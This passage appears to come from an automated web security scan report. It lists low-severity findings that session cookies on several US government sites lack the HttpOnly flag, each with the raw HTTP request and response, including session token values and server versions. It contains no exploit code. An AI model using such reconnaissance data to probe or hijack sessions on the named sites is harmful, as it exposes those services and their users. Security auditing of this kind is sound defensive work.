Set-Cookie: SESS489331f7119935ed8b06bb0fd9ed673c=1b73264372517897b1436e85efebe5ad; expires=Mon, 23-May-2011 16:13:55 GMT; path=/; domain=.tanfa.co.uk
Last-Modified: Sat, 30 Apr 2011 12:40:35 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

14.208. https://www.tennesseeanytime.org/paams-app/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.tennesseeanytime.org
Path:   /paams-app/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /paams-app/index.htm HTTP/1.1
Host: www.tennesseeanytime.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:58:48 GMT
Server: Resin/3.0.17
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: JSESSIONID=au9PJ-Uy5Bf7XJ6J_s; path=/
Connection: close
Content-Length: 3269


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin tem
...[SNIP]...

14.209. http://www.texasonline.state.tx.us/app/orig/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.texasonline.state.tx.us
Path:   /app/orig/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/orig/index.jsp HTTP/1.1
Host: www.texasonline.state.tx.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:38:42 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.30 mod_ssl/2.2.17 OpenSSL/1.0.0c
Set-Cookie: JSESSIONID=37498BA42F642B89A5AE299F73333140; Path=/app
Content-Length: 4361
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...

14.210. http://www.theoutdoorshop.state.pa.us/FBG/game/GameLicenseSelect.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.theoutdoorshop.state.pa.us
Path:   /FBG/game/GameLicenseSelect.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FBG/game/GameLicenseSelect.asp HTTP/1.1
Host: www.theoutdoorshop.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:40:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.theoutdoorshop.state.pa.us//FBG/game/GameLicenseSelect.asp?ShopperID=B92EEF7205AF44E3839ECD47B5796E78
Content-Length: 233
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQBSDCRT=BKBCJLMBKJDNOAFPIAEPJGMM; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.theoutdoorshop.state.pa.us//FBG/game/GameLicenseSelect.asp?ShopperID=B92EEF7205AF44E383
...[SNIP]...

14.211. http://www.txdmv.gov/vehicles/registration/register.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.txdmv.gov
Path:   /vehicles/registration/register.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /vehicles/registration/register.htm HTTP/1.1
Host: www.txdmv.gov
Proxy-Connection: keep-alive
Referer: http://www.texas.gov/en/search/Pages/results.aspx?q=Vehicle%20Registration
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:22:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 19088
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDAQACC=PLKHHPEBHPPKKKLPIDIJMABL; path=/
Cache-control: private

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...

14.212. http://www.utah.gov/locationaware/getMeetings.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.utah.gov
Path:   /locationaware/getMeetings.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /locationaware/getMeetings.html?cityName=Salt%20Lake%20City&listSize=5 HTTP/1.1
Host: www.utah.gov
Proxy-Connection: keep-alive
Referer: http://www.utah.gov/index.html
Origin: http://www.utah.gov
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.1.10.1304162117; fontsize=90%25; city=Salt%20Lake%20City; zip=84101
Content-Length: 0

Response

HTTP/1.1 200 OK
X-Powered-By: JSP/2.1
Server: Sun Java System Application Server 9.1_01
Set-Cookie: JSESSIONID=61f56da21c85e749be2f54c0aea4; Path=/locationaware
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sat, 30 Apr 2011 11:16:02 GMT
Content-Length: 4352


<div id="calendar">
<p class="navi"></p>

<div class="calendarOuput">
<table border="0" class="calBox">
<tr class="month">

...[SNIP]...

14.213. http://www.utah.gov/pmn/sitemap/notice/67945.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.utah.gov
Path:   /pmn/sitemap/notice/67945.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pmn/sitemap/notice/67945.html HTTP/1.1
Host: www.utah.gov
Proxy-Connection: keep-alive
Referer: http://www.utah.gov/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.1.10.1304162117; fontsize=90%25; city=Salt%20Lake%20City; zip=84101

Response

HTTP/1.1 200 OK
X-Powered-By: JSP/2.1
Server: Sun Java System Application Server 9.1_01
Set-Cookie: JSESSIONID=62587d63028fa9a37c10611f1005; Path=/pmn
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sat, 30 Apr 2011 11:22:48 GMT
Content-Length: 12502


<!DOCTYPE HTML>
<html>
   <head>
       <title>Public Meeting Notices</title>
           <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
           <script type='text/javascript' src=
...[SNIP]...

14.214. http://www.utah.gov/services/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.utah.gov
Path:   /services/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/ HTTP/1.1
Host: www.utah.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: zip=84101; JSESSIONID=6253ef0c9fd08dd164ed9fc46b87; __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.2.10.1304162117; fontsize=90%25; city=Salt%20Lake%20City;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:40:52 GMT
Server: Sun Java System Application Server 9.1_02
X-Powered-By: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=66d01a51b6b7b0827a9104dec47e; Path=/utah-gov
Connection: close
Content-Length: 27263


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head
...[SNIP]...

14.215. http://www.utah.gov/services/business.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.utah.gov
Path:   /services/business.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/business.html HTTP/1.1
Host: www.utah.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: zip=84101; JSESSIONID=6253ef0c9fd08dd164ed9fc46b87; __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.2.10.1304162117; fontsize=90%25; city=Salt%20Lake%20City;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:40:53 GMT
Server: Sun Java System Application Server 9.1_02
X-Powered-By: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=66d06281f671c104df4e14d571af; Path=/utah-gov
Connection: close
Content-Length: 27819


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
    <ti
...[SNIP]...

14.216. http://www.utah.gov/services/financial.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.utah.gov
Path:   /services/financial.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/financial.html HTTP/1.1
Host: www.utah.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: zip=84101; JSESSIONID=6253ef0c9fd08dd164ed9fc46b87; __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.2.10.1304162117; fontsize=90%25; city=Salt%20Lake%20City;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:40:53 GMT
Server: Sun Java System Application Server 9.1_02
X-Powered-By: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=66d0849f7b9c20f1e1a49d53a4f8; Path=/utah-gov
Connection: close
Content-Length: 24360


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
    <ti
...[SNIP]...

14.217. http://www.utah.gov/services/index.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.utah.gov
Path:   /services/index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/index.html HTTP/1.1
Host: www.utah.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: zip=84101; JSESSIONID=6253ef0c9fd08dd164ed9fc46b87; __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.2.10.1304162117; fontsize=90%25; city=Salt%20Lake%20City;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:40:54 GMT
Server: Sun Java System Application Server 9.1_02
X-Powered-By: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=66d0a4f8ee8650fe870693add6be; Path=/utah-gov
Connection: close
Content-Length: 27263


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head
...[SNIP]...

14.218. http://www.utah.gov/transparency/entity_profile.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.utah.gov
Path:   /transparency/entity_profile.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /transparency/entity_profile.html HTTP/1.1
Host: www.utah.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: zip=84101; JSESSIONID=6253ef0c9fd08dd164ed9fc46b87; __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.2.10.1304162117; fontsize=90%25; city=Salt%20Lake%20City;

Response

HTTP/1.1 200 OK
X-Powered-By: JSP/2.1
Server: Sun Java System Application Server 9.1_02
Set-Cookie: JSESSIONID=66d0c83b54b560a2051719c380fe; Path=/transparency
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sat, 30 Apr 2011 12:40:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-e
...[SNIP]...

14.219. http://www.utah.gov/transparency/index.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.utah.gov
Path:   /transparency/index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /transparency/index.html HTTP/1.1
Host: www.utah.gov
Proxy-Connection: keep-alive
Referer: http://www.utah.gov/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.1.10.1304162117; fontsize=90%25; city=Salt%20Lake%20City; zip=84101

Response

HTTP/1.1 200 OK
X-Powered-By: JSP/2.1
Server: Sun Java System Application Server 9.1_02
Set-Cookie: JSESSIONID=626d4214fda370cce1e6f0b9f88f; Path=/transparency
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sat, 30 Apr 2011 11:24:13 GMT
Content-Length: 18333


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

14.220. http://www.utah.gov/whatsnew/rss.xml  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.utah.gov
Path:   /whatsnew/rss.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /whatsnew/rss.xml?category=news HTTP/1.1
Host: www.utah.gov
Proxy-Connection: keep-alive
Referer: http://www.utah.gov/index.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.1.10.1304162117; fontsize=90%25

Response

HTTP/1.1 200 OK
X-Powered-By: JSP/2.1
Server: Sun Java System Application Server 9.1_02
Set-Cookie: JSESSIONID=62070a53aa8d709116624dd4203e; Path=/whatsnew
Content-Type: text/xml;charset=UTF-8
Content-Language: en-US
Date: Sat, 30 Apr 2011 11:17:14 GMT
Content-Length: 9549

<?xml version="1.0" encoding="UTF-8"?>


<rss version="2.0">
   <channel>
       <title>Utah.gov News Provider</title>
       <link>http://www.utah.gov/whatsnew.html</link>
       <description>This is the news provi
...[SNIP]...

14.221. http://www.va.gov/ext_redirect.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.va.gov
Path:   /ext_redirect.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ext_redirect.asp HTTP/1.1
Host: www.va.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s={"v":1,"rid":"1304117532703_517290","pv":2,"to":5,"c":"http://www.va.gov/landing2_contact.htm","lc":{"d2":{"v":2,"s":false}},"cd":2,"sd":2,"f":1304123963094}; TSb10539=80cacfc42d1d4f40ba214cdbf5db1539665370359c60aa8d4dbb5a23c2db820ec935e97e6ded1920fabfe7d6; fsr.a=1304123974811; BIGipServerwww.va.gov_pool=1694607552.20480.0000; BIGipServerwww.va.gov.subpages_pool=1761716416.20480.0000;

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 139
Content-Type: text/html
Location: http://www.va.gov/
Set-Cookie: ASPSESSIONIDCATAASQA=MACAECMBNGFNPFHDALOAJDFN; path=/
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 12:40:57 GMT
Connection: close
Set-Cookie: TSb10539=ae84415bfdd45397cfbfd2179495c47750d29971b9f684624dbc035a; Max-Age=900; Path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.va.gov/">here</a>.</body>

14.222. https://www.vermontjoblink.com/ada/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/ HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:06:48 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Set-Cookie: TEST=1;path=/
Set-Cookie: SYSTRANLANGUAGE=en;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.223. https://www.vermontjoblink.com/ada/404/404_qry.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/404/404_qry.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/404/404_qry.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:07:01 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.224. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/documents/eeoislaw.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
